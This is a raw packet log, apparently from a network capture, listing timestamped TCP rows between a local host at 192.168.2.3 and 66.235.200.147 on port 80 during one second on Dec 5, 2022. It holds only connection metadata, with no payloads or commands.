Dec 5, 2022 01:32:37.963608980 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963633060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963648081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963664055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963676929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963695049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963726044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963736057 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963757038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963766098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963788033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963793993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963818073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963825941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963849068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963860035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963880062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963888884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963912010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963943005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963952065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963974953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963983059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.964005947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964016914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.964039087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964046001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.964068890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964102030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964132071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964162111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964195013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964224100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964255095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964284897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964313984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964342117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964370966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964401007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964431047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964459896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964490891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964519978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964549065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964579105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964607954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964637995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964668989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964698076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964728117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964756966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964786053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964814901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964843988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.964982986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965055943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965086937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965118885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965148926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965178013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965208054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965238094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965266943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965296984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965327978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965358019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965388060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965418100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965446949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965476036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965506077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965536118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965567112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965595961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965626001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965656042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965686083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965715885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965744972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965775013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965805054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965833902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965836048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.965861082 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.965864897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965895891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965925932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.965980053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966010094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966042042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966069937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966101885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966130972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966161013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966191053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966221094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966250896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966281891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966310978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966351986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966370106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966387987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966406107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966424942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966443062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966450930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.966463089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966474056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.966480970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966500044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966506958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.966520071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966537952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966555119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.966556072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966576099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966594934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966614008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966630936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966644049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.966650009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.966666937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.966862917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.966991901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967010975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967030048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967062950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967062950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967075109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967082977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967103004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967117071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967122078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967129946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967142105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967152119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967160940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967164040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967184067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967195988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967237949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967256069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967274904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967286110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967293978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967297077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967308044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967356920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967370987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967390060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967407942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967426062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967432022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967461109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967482090 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967564106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967581987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967600107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967602968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967618942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967622995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967633009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967638969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967658043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967675924 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967698097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967705965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967756033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967791080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967793941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967824936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967828989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967875004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967895031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967916012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967935085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967953920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967972040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.967972994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.967993021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968009949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968066931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968086958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968105078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968116045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968123913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968128920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968153000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968166113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968173027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968192101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968209028 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968262911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968281031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968306065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968324900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968341112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968359947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968390942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968399048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968426943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968432903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968488932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968519926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968523026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968532085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968585014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968604088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968625069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968636036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968646049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968672037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968689919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968708992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968708992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968732119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968754053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968755007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968774080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968795061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968810081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968821049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968868971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968910933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968925953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968945026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968959093 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968964100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.968982935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.968983889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969005108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969022989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969032049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969058037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969074011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969078064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969094038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969124079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969140053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969185114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969203949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969232082 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969244003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969250917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969270945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969307899 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969325066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969348907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969350100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969358921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969443083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969463110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969481945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969500065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969517946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969536066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969580889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969599962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969676971 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969687939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969707966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969727039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969732046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969747066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969757080 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969768047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969769955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969789028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969809055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969830990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969876051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969894886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969913960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969932079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969938993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969952106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969964027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.969985962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.969990015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970079899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970099926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970103025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970119953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970125914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970139980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970143080 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970153093 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970159054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970195055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970207930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970278978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970310926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970319986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970330000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970350027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970369101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970377922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970386982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970388889 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970415115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970426083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970463037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970483065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970500946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970521927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970606089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970623970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970642090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970659971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970664024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970684052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970705986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970710039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970727921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970767021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970772028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970791101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970810890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970830917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970833063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970848083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970851898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970871925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970882893 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970912933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970920086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.970932007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970951080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970968962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.970988035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971007109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971014023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.971033096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.971052885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.971070051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971091032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971129894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.971177101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971194983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971235037 CET	49705	80	192.168.2.3	66.235.200.147
